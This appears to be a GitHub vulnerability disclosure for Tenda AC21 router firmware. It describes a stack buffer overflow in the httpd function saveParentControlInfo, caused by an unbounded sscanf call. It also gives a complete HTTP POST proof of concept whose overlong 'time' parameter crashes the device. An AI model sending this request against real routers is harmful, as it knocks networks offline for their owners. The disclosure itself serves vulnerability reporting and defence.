Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time

Tenda AC21(V16.03.08.15) contains stack Buffer Overflow Vulnerability

overview

product information

Tenda A21(V16.03.08.15), latest version of simulation overview:

image-20220902202242019

description

1. Vulnerability Details

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsaveParentControlInfo .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

In function saveParentControlInfo, it calls compare_parentcontrol_time(a1), the vulnerability is in this function.

image-20220902202709225

It calls sscanf(s, “%[^-]-%s”, v3, v4) and v4 is on the stack, so there is a buffer overflow vulnerability.

image-20220902202810293

2. Recurring loopholes and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.0.1
Content-Length: 137
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: password=25d55ad283aa400af464c76d713c07adwfrcvb
Connection: close

time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%2daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

image-20220902202507664